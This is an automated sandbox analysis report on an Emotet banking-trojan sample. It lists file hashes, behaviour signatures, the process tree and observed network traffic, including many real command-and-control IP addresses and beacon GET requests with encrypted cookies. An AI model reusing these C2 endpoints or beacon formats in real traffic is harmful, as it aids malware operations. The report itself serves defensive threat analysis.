Overview

overview

10

Static

static

10

Malware-1-...30.exe

windows7-x64

10

Malware-1-...30.exe

windows10-2004-x64

10

Malware-1-...40.exe

windows7-x64

10

Malware-1-...40.exe

windows10-2004-x64

10

Malware-1-...32.exe

windows7-x64

10

Malware-1-...32.exe

windows10-2004-x64

10

Malware-1-.../5.exe

windows7-x64

10

Malware-1-.../5.exe

windows10-2004-x64

10

Malware-1-...91.exe

windows7-x64

10

Malware-1-...91.exe

windows10-2004-x64

10

Malware-1-...ey.exe

windows7-x64

7

Malware-1-...ey.exe

windows10-2004-x64

7

Malware-1-...ad.exe

windows7-x64

3

Malware-1-...ad.exe

windows10-2004-x64

3

Malware-1-...ve.bat

windows7-x64

7

Malware-1-...ve.bat

windows10-2004-x64

7

Malware-1-...ve.exe

windows7-x64

6

Malware-1-...ve.exe

windows10-2004-x64

7

Malware-1-...ya.exe

windows7-x64

6

Malware-1-...ya.exe

windows10-2004-x64

Malware-1-...re.exe

windows7-x64

10

Malware-1-...re.exe

windows10-2004-x64

10

Malware-1-...ry.exe

windows7-x64

10

Malware-1-...ry.exe

windows10-2004-x64

10

Malware-1-...ue.exe

windows7-x64

3

Malware-1-...ue.exe

windows10-2004-x64

1

Malware-1-...kt.bat

windows7-x64

7

Malware-1-...kt.bat

windows10-2004-x64

Malware-1-...o3.exe

windows7-x64

Malware-1-...o3.exe

windows10-2004-x64

10

Malware-1-...ey.exe

windows7-x64

10

Malware-1-...ey.exe

windows10-2004-x64

10

Resubmissions

13/02/2025, 01:26 UTC

250213-btppra1pcz 10

17/01/2025, 20:14 UTC

250117-yz7h3s1qfw 10

17/01/2025, 20:12 UTC

250117-yy9l2sslcr 10

17/01/2025, 17:25 UTC

250117-vy9p9sxpez 10

17/01/2025, 17:21 UTC

250117-vw8eesyjfp 10

17/01/2025, 14:16 UTC

250117-rk9ass1rhk 10

17/01/2025, 14:12 UTC

250117-rhv1ds1lds 10

16/01/2025, 12:52 UTC

250116-p4et7a1mez 10

Analysis

  • max time kernel
    565s
  • max time network
    571s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/01/2025, 14:16 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Malware-1-master/2530.exe

  • Size

    1.2MB

  • MD5

    568d17d6da77a46e35c8094a7c414375

  • SHA1

    500fa749471dad4ae40da6aa33fd6b2a53bcf200

  • SHA256

    0da56126ffb57acb5bb1a3ffa1c4c0c2605d257988b2d2964344b8f23173f615

  • SHA512

    7beb044f8bd366350b267c0fedc8466d2c5fd80b0f791f5697ce4577edced36b668401fd48df90b6c4ced05247d990c5e739e7232a2dcfc059dcc0c6a79d9427

  • SSDEEP

    12288:D+FwW6Se3oB/8WjH2fIGOVoDJLvfOqsUFY:D+qJSgZwEIGOVUJLnOqs+Y

Score
10/10
emotetbankerdiscoverytrojan

Malware Config

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Emotet family
    emotet
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Malware-1-master\2530.exe
    "C:\Users\Admin\AppData\Local\Temp\Malware-1-master\2530.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3572
    • C:\Users\Admin\AppData\Local\Temp\Malware-1-master\2530.exe
      "C:\Users\Admin\AppData\Local\Temp\Malware-1-master\2530.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      PID:2652
  • C:\Windows\SysWOW64\strshooter.exe
    "C:\Windows\SysWOW64\strshooter.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Windows\SysWOW64\strshooter.exe
      "C:\Windows\SysWOW64\strshooter.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      PID:4292

Network

  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    120.250.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    120.250.22.2.in-addr.arpa
    IN PTR
    Response
    120.250.22.2.in-addr.arpa
    IN PTR
    a2-22-250-120deploystaticakamaitechnologiescom
  • flag-us
    DNS
    67.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.98.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.98.22.2.in-addr.arpa
    IN PTR
    Response
    7.98.22.2.in-addr.arpa
    IN PTR
    a2-22-98-7deploystaticakamaitechnologiescom
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.190.18.2.in-addr.arpa
    IN PTR
    Response
    167.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-167deploystaticakamaitechnologiescom
  • flag-us
    DNS
    217.72.21.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.72.21.2.in-addr.arpa
    IN PTR
    Response
    217.72.21.2.in-addr.arpa
    IN PTR
    a2-21-72-217deploystaticakamaitechnologiescom
  • flag-us
    GET
    http://38.140.147.42/
    strshooter.exe
    Remote address:
    38.140.147.42:80
    Request
    GET / HTTP/1.1
    Cookie: 38714=LFPROHv/n6ryEoY7tJHzycOIUBNqdqM71qL7+QuV7+11X5NdIZww0eeMol5r35rHX0eld1b9ueFGj9/wCE5TaGLnmTdDV19avklJ9j0NZdpg1hQKrAxGCi2tgO/BsYHhNDZbYNXpeolL8C3TbBCNIH/BayVKUuHWqxii3FsxjvEZQrCj5z//VN/ivxR3SbJkhnUjRR53NYHcKShTGjgXqZrItLTaOPeiuQIh9KDinHIQFfHDNYb2i67k2DavWTSD1UIqRT7y53vT+VxbFV45dO2E0foGhhd8PxE31Tz+F1ehNgeB9Gl38/2p3pj7Qwfj7JFkghPAsUhw8j41vGV3uELHf+HtsuTWa0q0b1uyQaz5paXMI8JS9BQOrvXNQu/MkuZuV1Gkq3pc+sfbVs0AyecfAtVtKRclpwplEb/nOzCCYdlMQTXtJyjKbI6Hc8dhDWaga9RRtycvq65X7G2q8BnqFwV3ECUuT21fHYq41/GVsRXSHnvedRic9T7r6ThQ9VpzD4t+2i+v2w7R/jZBKm7kItQ=
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 38.140.147.42
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.0 200 OK
    Server: SonicWALL
    Expires: -1
    Cache-Control: no-cache
    Content-type: text/html; charset=UTF-8;
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' blob: data: ws: wss: sonicwall.com *.sonicwall.com;
  • flag-us
    DNS
    42.147.140.38.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    42.147.140.38.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    152.141.79.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    152.141.79.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://67.205.149.117:443/
    strshooter.exe
    Remote address:
    67.205.149.117:443
    Request
    GET / HTTP/1.1
    Cookie: 30832=Vu5l5qRpx4KxH2bTc79lo+5fhJB8aDnqHQNY6ZY8KyCqtlOaDFeAaMd6SPp6d/2gWLmrSXis81bs4LXTh++JNZ3M2Bw+wMj9+k3JIlw1W6bPnutFuQueh1qixgkNYpRB9YRYiDdYhY8Eup8+VVWoE14/49jJYLzBxW9YoYJuhJiq8heMsq9pXMrPbYCDk5FW1Kugsi4hOxsFQIrGjNboU8aHuxU8OXmdRlyjY6U5PwT0QYTZ+GmFpTVP8+sbcC6eZuMEZki9+hcnfevCbycTq4wLvrIQzNyMs2gGpEedIJ2saeqlR8fGI91eH+plKfJZeCoLGYT7tQhhimZMyGYlKKAdahE/3pHHrVkJ0p7EJyuQT+TGg247sjGXokmrSXYU9RKlN6gO7hUiAefcSKtGdtrjzz/o49uHPv6D723qvC0UFwm4UOFCsdZLqX3COYurFRWLDmRNkp6Ag3fx2OmePGyN4lva6/2O1lCh66Ln8EEiHwCWXPWZJniThGdsNOYWrVLZDw==
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 67.205.149.117:443
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx
    Date: Fri, 17 Jan 2025 14:25:45 GMT
    Content-Type: text/html
    Content-Length: 650
    Connection: close
    Strict-Transport-Security: max-age=604800; includeSubDomains
  • flag-us
    DNS
    117.149.205.67.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    117.149.205.67.in-addr.arpa
    IN PTR
    Response
  • 75.112.62.42:80
    strshooter.exe
    260 B
     5
  • 107.13.144.134:80
    strshooter.exe
    260 B
     5
  • 38.140.147.42:80
    http://38.140.147.42/
    http
    strshooter.exe
    1.3kB
     3.4kB
     10
    7

    HTTP Request

    GET http://38.140.147.42/

    HTTP Response

    200
  • 192.24.7.148:80
    strshooter.exe
    260 B
     5
  • 70.27.207.164:7080
    strshooter.exe
    260 B
     5
  • 153.101.7.207:8443
    strshooter.exe
    260 B
     5
  • 47.189.188.195:80
    strshooter.exe
    260 B
     5
  • 54.37.23.118:80
    strshooter.exe
    260 B
     5
  • 77.85.44.164:443
    strshooter.exe
    260 B
     5
  • 99.199.195.235:50000
    strshooter.exe
    260 B
     5
  • 5.35.242.34:7080
    strshooter.exe
    260 B
     5
  • 45.123.3.54:443
    strshooter.exe
    260 B
     5
  • 24.76.123.171:443
    strshooter.exe
    260 B
     5
  • 24.223.109.139:443
    strshooter.exe
    260 B
     5
  • 190.186.70.202:8090
    strshooter.exe
    260 B
     5
  • 5.230.147.179:8080
    strshooter.exe
    260 B
     5
  • 84.200.106.120:8080
    strshooter.exe
    260 B
     5
  • 64.19.32.70:443
    strshooter.exe
    260 B
     5
  • 217.174.206.181:443
    strshooter.exe
    260 B
     5
  • 153.122.38.158:443
    strshooter.exe
    260 B
     5
  • 217.13.106.160:7080
    strshooter.exe
    260 B
     5
  • 67.205.149.117:443
    http://67.205.149.117:443/
    http
    strshooter.exe
    1.1kB
     1.1kB
     6
    5

    HTTP Request

    GET http://67.205.149.117:443/

    HTTP Response

    400
  • 41.220.0.26:80
    strshooter.exe
    260 B
     200 B
     5
    5
  • 222.214.218.192:4143
    strshooter.exe
    260 B
     5
  • 95.141.175.240:443
    strshooter.exe
    260 B
     5
  • 110.143.57.109:80
    strshooter.exe
    260 B
     5
  • 85.105.250.128:443
    strshooter.exe
    260 B
     5
  • 46.163.76.187:8080
    strshooter.exe
    260 B
     5
  • 78.187.72.87:80
    strshooter.exe
    156 B
     3
  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    120.250.22.2.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    120.250.22.2.in-addr.arpa

  • 8.8.8.8:53
    67.31.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    67.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    7.98.22.2.in-addr.arpa
    dns
    68 B
     129 B
     1
    1

    DNS Request

    7.98.22.2.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    167.190.18.2.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    167.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    217.72.21.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    217.72.21.2.in-addr.arpa

  • 8.8.8.8:53
    42.147.140.38.in-addr.arpa
    dns
    72 B
     130 B
     1
    1

    DNS Request

    42.147.140.38.in-addr.arpa

  • 8.8.8.8:53
    21.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    21.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    152.141.79.40.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    152.141.79.40.in-addr.arpa

  • 8.8.8.8:53
    73.31.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    73.31.126.40.in-addr.arpa

  • 8.8.8.8:53
    117.149.205.67.in-addr.arpa
    dns
    73 B
     140 B
     1
    1

    DNS Request

    117.149.205.67.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2448-21-0x0000000000570000-0x0000000000580000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2448-30-0x0000000000E30000-0x0000000000E49000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2448-15-0x0000000000E50000-0x0000000000E69000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2448-19-0x0000000000E50000-0x0000000000E69000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2448-20-0x0000000000E30000-0x0000000000E49000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-7-0x00000000022B0000-0x00000000022C9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-28-0x0000000002290000-0x00000000022A9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-12-0x0000000002290000-0x00000000022A9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-31-0x0000000000400000-0x000000000052A000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/2652-32-0x0000000002290000-0x00000000022A9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-11-0x00000000022B0000-0x00000000022C9000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2652-13-0x00000000022D0000-0x00000000022E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3572-5-0x0000000000610000-0x0000000000629000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3572-1-0x0000000000610000-0x0000000000629000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3572-6-0x00000000005B0000-0x00000000005C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3572-0-0x00000000005F0000-0x0000000000609000-memory.dmp

    Filesize

    100KB

    Download

  • memory/3572-14-0x00000000005F0000-0x0000000000609000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4292-22-0x0000000000F50000-0x0000000000F69000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4292-23-0x0000000000F70000-0x0000000000F89000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4292-27-0x0000000000F70000-0x0000000000F89000-memory.dmp

    Filesize

    100KB

    Download

  • memory/4292-29-0x0000000000F90000-0x0000000000FA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4292-33-0x0000000000F50000-0x0000000000F69000-memory.dmp

    Filesize

    100KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.